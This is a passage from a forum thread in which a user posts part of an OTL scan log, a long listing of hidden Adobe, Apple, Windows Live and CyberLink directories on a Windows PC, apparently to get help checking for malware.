[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader\X\using
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ca_ES
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\cs_CZ
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\da_DK
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\de_DE
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\es_ES
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\eu_ES
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\fi_FI
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\fr_FR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\hr_HR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\hu_HU
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\it_IT
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ja_JP
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ko_KR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\nb_NO
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\nl_NL
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\pl_PL
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\pt_BR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ro_RO
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ru_RU
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sk_SK
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sl_SI
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sv_SE
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\tr_TR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\uk_UA
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\zh_CN
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\zh_TW
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ColorSync.resources
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreGraphics.resources
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\Foundation.resources
[2015/02/04 08:11:07 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources
[2015/02/04 08:11:07 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaToolbox.resources
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ar.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ca.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\cs.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\da.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\de.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\el.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\English.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\en_GB.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\es.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\fi.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\fr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\he.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\hr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\hu.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\id.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\it.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ja.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ko.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ms.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\nb.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\nl.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pl.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pt.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pt_PT.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ro.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ru.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\sk.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\sv.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\th.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\tr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\uk.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\vi.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\zh_CN.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\zh_TW.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ar.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ca.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\cs.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\da.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\de.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\el.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\English.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\es.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\fi.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\fr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\he.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\hr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\hu.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\id.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\it.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ko.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ms.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\nb.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\nl.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pl.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pt.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pt_PT.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ro.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ru.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\sk.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\sv.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\th.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\tr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\uk.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\vi.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\zh_CN.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\zh_TW.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ColorSync.resources\Profiles
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreFoundation.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\Foundation.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources\en_GB.lproj
[2015/02/04 08:11:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.IE.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.MobileSync.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Outlook.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Safari.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsContacts.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsMail.client.resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServicesUI.Resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.IE.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Outlook.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Safari.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsContacts.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsMail.client.resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Bookmarks.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Bookmarks.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Calendars.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Calendars.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Contacts.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Contacts.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Notes.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Notes.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServicesUI.Resources\English.lproj
  • あすとろ
  • 2015/09/12 (Sat) 23:45:18
OTL4
[2014/07/11 01:11:14 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\EAInstaller\PlantsvsZombies
[2013/08/08 09:41:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Intel Corporation\IAStorUtil
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\TextConv
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\Triedit
[2010/11/21 16:25:34 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\ink\HWRCustomization
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\TextConv\ja-JP
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\Triedit\ja-JP
[2012/06/20 12:00:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e4074ef21cd4e900a
[2012/06/20 12:00:48 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e4f2f72d1cd4e900e
[2012/06/20 12:00:49 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e57d06fd1cd4e9010
[2012/06/20 12:00:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e6a692ff1cd4e9015
[2012/06/20 12:00:53 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e7ac6a5d1cd4e9017
[2012/06/20 12:00:54 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e84e47f01cd4e9019
[2012/06/20 12:00:58 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\eab46af71cd4e901c
[2012/06/20 12:01:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\eca127d01cd4e9020
[2012/06/20 12:01:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\ee1ba29b1cd4e9023
[2012/06/20 12:01:08 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f0926f441cd4e9025
[2012/06/20 12:01:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f1f0598c1cd4e9027
[2012/06/20 12:01:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f23300141cd4e9029
[2012/06/20 12:01:11 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f2a07f601cd4e902b
[2012/06/20 12:01:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f376bb391cd4e902d
[2012/06/20 12:01:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f3d853a41cd4e9030
[2012/06/20 12:01:14 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f41898cc1cd4e9031
[2012/06/20 12:01:15 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f4cfe2c11cd4e9034
[2012/06/20 12:01:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f59a37b81cd4e9036
[2012/06/20 12:01:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f5fe31831cd4e9038
[2012/06/20 12:01:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f6e9d9bf1cd4e903a
[2012/06/20 12:01:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f701a7811cd4e903c
[2012/06/20 12:01:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f73143071cd4e903e
[2012/06/20 12:01:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f74b722a1cd4e9040
[2012/06/20 12:13:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Chs\images
[2012/06/20 12:13:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Cht\images
[2012/06/20 12:13:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Csy\images
[2012/06/20 12:13:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Dan\images
[2012/06/20 12:13:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Deu\images
[2012/06/20 12:13:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Ell\images
[2012/06/20 12:13:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Enu\images
[2012/06/20 12:13:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Esp\images
[2012/06/20 12:13:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Fin\images
[2012/06/20 12:13:21 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Fra\images
[2012/06/20 12:13:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Hun\images
[2012/06/20 12:13:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Ita\images
[2012/06/20 12:13:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Jpn\images
[2012/06/20 12:13:24 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Kor\images
[2012/06/20 12:13:24 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Nld\images
[2012/06/20 12:13:25 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Nor\images
[2012/06/20 12:13:26 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Plk\images
[2015/08/24 15:09:30 | 000,000,000 | -H-D | M] -- C:\ProgramData\Apple Computer\iTunes\SC Info
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\ProgramData\Microsoft\WwanSvc
[2010/11/21 16:25:02 | 000,000,000 | RH-D | M] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tablet PC
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\ProgramData\Microsoft\WwanSvc\Profiles
[2014/04/01 21:29:29 | 000,000,000 | RH-D | M] -- C:\Users\Default
[2015/08/24 15:09:30 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Apple Computer\iTunes\SC Info
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Microsoft\WwanSvc
[2010/11/21 16:25:02 | 000,000,000 | RH-D | M] -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Tablet PC
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Microsoft\WwanSvc\Profiles
[2009/07/14 12:20:08 | 000,000,000 | -H-D | M] -- C:\Users\Default\AppData
[2014/04/01 21:29:34 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData
[2014/04/09 23:21:59 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads
[2014/04/01 21:31:40 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~
